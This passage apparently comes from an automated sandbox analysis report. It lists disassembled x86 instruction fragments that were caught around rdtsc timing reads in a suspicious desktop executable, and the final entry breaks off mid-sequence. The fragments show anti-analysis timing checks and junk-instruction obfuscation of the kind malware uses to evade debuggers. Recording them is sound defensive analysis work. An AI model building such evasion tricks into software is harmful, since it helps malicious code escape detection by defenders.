Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01042 second address: 6F0106E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007FF6D0B95BEDh 0x0000000f jne 00007FF741174269h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF6D0B95BEDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0106E second address: 6F01074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01074 second address: 6F01078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01078 second address: 6F01098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF6D0B64821h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01098 second address: 6F010AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F010AD second address: 6F0115A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF6D0B64827h 0x00000009 and si, C3EEh 0x0000000e jmp 00007FF6D0B64829h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF6D0B64820h 0x0000001a sub ax, 3368h 0x0000001f jmp 00007FF6D0B6481Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov eax, dword ptr [esi] 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FF6D0B64824h 0x00000031 add si, 85C8h 0x00000036 jmp 00007FF6D0B6481Bh 0x0000003b popfd 0x0000003c mov di, ax 0x0000003f popad 0x00000040 mov dword ptr [edx], eax 0x00000042 jmp 00007FF6D0B64822h 0x00000047 mov eax, dword ptr [esi+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov dx, 3440h 0x00000051 push ebx 0x00000052 pop esi 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0115A second address: 6F0119F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c jmp 00007FF6D0B95BF0h 0x00000011 mov eax, dword ptr [esi+08h] 0x00000014 jmp 00007FF6D0B95BF0h 0x00000019 mov dword ptr [edx+08h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0119F second address: 6F011A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F011A3 second address: 6F011A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F011A7 second address: 6F011AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F011AD second address: 6F011B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F011B3 second address: 6F011B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F011B7 second address: 6F01206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+0Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF6D0B95BEEh 0x00000015 xor si, 7A78h 0x0000001a jmp 00007FF6D0B95BEBh 0x0000001f popfd 0x00000020 movzx esi, di 0x00000023 popad 0x00000024 mov dword ptr [edx+0Ch], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF6D0B95BEEh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01206 second address: 6F012EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF6D0B64827h 0x00000017 sbb cx, FC4Eh 0x0000001c jmp 00007FF6D0B64829h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FF6D0B64820h 0x00000028 sub cl, FFFFFFC8h 0x0000002b jmp 00007FF6D0B6481Bh 0x00000030 popfd 0x00000031 popad 0x00000032 popad 0x00000033 mov dword ptr [edx+10h], eax 0x00000036 jmp 00007FF6D0B64826h 0x0000003b mov eax, dword ptr [esi+14h] 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FF6D0B6481Eh 0x00000045 and ch, 00000058h 0x00000048 jmp 00007FF6D0B6481Bh 0x0000004d popfd 0x0000004e mov si, 570Fh 0x00000052 popad 0x00000053 mov dword ptr [edx+14h], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov bl, FDh 0x0000005b pushfd 0x0000005c jmp 00007FF6D0B64828h 0x00000061 jmp 00007FF6D0B64825h 0x00000066 popfd 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F012EE second address: 6F0137C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6D0B95BEAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e jmp 00007FF6D0B95BF0h 0x00000013 mov dword ptr [edx+18h], eax 0x00000016 pushad 0x00000017 mov dh, ah 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+1Ch] 0x0000001d jmp 00007FF6D0B95BF5h 0x00000022 mov dword ptr [edx+1Ch], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 pushad 0x00000028 popad 0x00000029 pop edi 0x0000002a pushfd 0x0000002b jmp 00007FF6D0B95BF6h 0x00000030 add esi, 629D7238h 0x00000036 jmp 00007FF6D0B95BEBh 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [esi+20h] 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FF6D0B95BF5h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0137C second address: 6F0138C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B6481Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0138C second address: 6F013B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF6D0B95BF0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F013B4 second address: 6F013B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F013B8 second address: 6F013BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F013BE second address: 6F0144C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+24h] 0x0000000d jmp 00007FF6D0B64822h 0x00000012 mov dword ptr [edx+24h], eax 0x00000015 jmp 00007FF6D0B64820h 0x0000001a mov eax, dword ptr [esi+28h] 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007FF6D0B6481Ch 0x00000024 jmp 00007FF6D0B64822h 0x00000029 popad 0x0000002a call 00007FF6D0B64822h 0x0000002f jmp 00007FF6D0B64822h 0x00000034 pop ecx 0x00000035 popad 0x00000036 mov dword ptr [edx+28h], eax 0x00000039 pushad 0x0000003a mov si, DB89h 0x0000003e popad 0x0000003f mov ecx, dword ptr [esi+2Ch] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0144C second address: 6F01450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01450 second address: 6F01456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01456 second address: 6F014AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, EBB5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+2Ch], ecx 0x0000000d pushad 0x0000000e mov dl, 0Ch 0x00000010 mov edi, eax 0x00000012 popad 0x00000013 mov ax, word ptr [esi+30h] 0x00000017 pushad 0x00000018 mov al, BAh 0x0000001a mov dh, 45h 0x0000001c popad 0x0000001d mov word ptr [edx+30h], ax 0x00000021 pushad 0x00000022 pushad 0x00000023 mov di, si 0x00000026 pushfd 0x00000027 jmp 00007FF6D0B95BEAh 0x0000002c add eax, 1383AC68h 0x00000032 jmp 00007FF6D0B95BEBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov eax, 2B04A25Fh 0x0000003e popad 0x0000003f mov ax, word ptr [esi+32h] 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov eax, edi 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014AB second address: 6F014B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014B0 second address: 6F014B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014B6 second address: 6F014BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014BA second address: 6F014CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014CC second address: 6F014D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014D0 second address: 6F014D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014D4 second address: 6F014DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014DA second address: 6F014DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F014DF second address: 6F01537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+34h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF6D0B64825h 0x00000014 and esi, 4FF4CE96h 0x0000001a jmp 00007FF6D0B64821h 0x0000001f popfd 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 mov dword ptr [edx+34h], eax 0x00000026 jmp 00007FF6D0B6481Ah 0x0000002b test ecx, 00000700h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01537 second address: 6F0153B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0153B second address: 6F01541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01541 second address: 6F01578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF741173DA4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF6D0B95BF7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01578 second address: 6F0157E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0157E second address: 6F015BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f pushad 0x00000010 mov al, 72h 0x00000012 mov edi, 211E0954h 0x00000017 popad 0x00000018 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000001c jmp 00007FF6D0B95BF3h 0x00000021 or dword ptr [edx+40h], FFFFFFFFh 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov ecx, ebx 0x0000002a push ebx 0x0000002b pop eax 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015BF second address: 6F015C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015C4 second address: 6F015D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015D2 second address: 6F015D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015D6 second address: 6F015F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015F0 second address: 6F01613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 call 00007FF6D0B6481Ah 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF6D0B6481Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01613 second address: 6F01662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF6D0B95BF1h 0x00000009 or si, 2AE6h 0x0000000e jmp 00007FF6D0B95BF1h 0x00000013 popfd 0x00000014 mov cx, C917h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b leave 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF6D0B95BF9h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01662 second address: 6F01672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B6481Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F50DE2 second address: 6F50E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF6D0B95BF7h 0x0000000b sub al, FFFFFFCEh 0x0000000e jmp 00007FF6D0B95BF9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FF6D0B95BEEh 0x0000001d push eax 0x0000001e pushad 0x0000001f mov edx, 452CBAF4h 0x00000024 pushfd 0x00000025 jmp 00007FF6D0B95BEDh 0x0000002a and eax, 5ADC0CB6h 0x00000030 jmp 00007FF6D0B95BF1h 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov bx, A53Eh 0x0000003f push ebx 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F50E67 second address: 6F50E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F50E6D second address: 6F50E9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov eax, 70EDB3DDh 0x00000013 mov ch, B0h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007FF6D0B95BEEh 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0725 second address: 6EF0744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0744 second address: 6EF0748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0748 second address: 6EF074E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF074E second address: 6EF0787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF6D0B95BEDh 0x00000013 adc ax, F626h 0x00000018 jmp 00007FF6D0B95BF1h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0787 second address: 6EF078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF078C second address: 6EF0792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0792 second address: 6EF0796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0796 second address: 6EF079A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF079A second address: 6EF07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF6D0B64825h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF07C0 second address: 6EF07D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF07D3 second address: 6EF07EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64824h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF07EB second address: 6EF07EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6E9085E second address: 6E9088E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64823h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF6D0B64825h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0C13 second address: 6EE0C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0C2D second address: 6EE0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF6D0B6481Fh 0x0000000b or cl, FFFFFFBEh 0x0000000e jmp 00007FF6D0B64829h 0x00000013 popfd 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF6D0B64823h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0C78 second address: 6EE0C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC001B second address: 6EC0021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0021 second address: 6EC0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0025 second address: 6EC004E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF6D0B64825h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC004E second address: 6EC0054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0054 second address: 6EC0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0058 second address: 6EC0078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF6D0B95BF5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0078 second address: 6EC009E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF6D0B64827h 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ah, bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC021F second address: 6EC02D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+24h], 00000000h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF6D0B95BECh 0x00000018 sub cx, 4958h 0x0000001d jmp 00007FF6D0B95BEBh 0x00000022 popfd 0x00000023 jmp 00007FF6D0B95BF8h 0x00000028 popad 0x00000029 lock bts dword ptr [edi], 00000000h 0x0000002e jmp 00007FF6D0B95BF0h 0x00000033 jc 00007FF741317D90h 0x00000039 jmp 00007FF6D0B95BF0h 0x0000003e pop edi 0x0000003f pushad 0x00000040 mov al, B2h 0x00000042 mov ebx, 7E87D22Eh 0x00000047 popad 0x00000048 pop esi 0x00000049 jmp 00007FF6D0B95BF5h 0x0000004e pop ebx 0x0000004f pushad 0x00000050 movzx eax, di 0x00000053 popad 0x00000054 mov esp, ebp 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 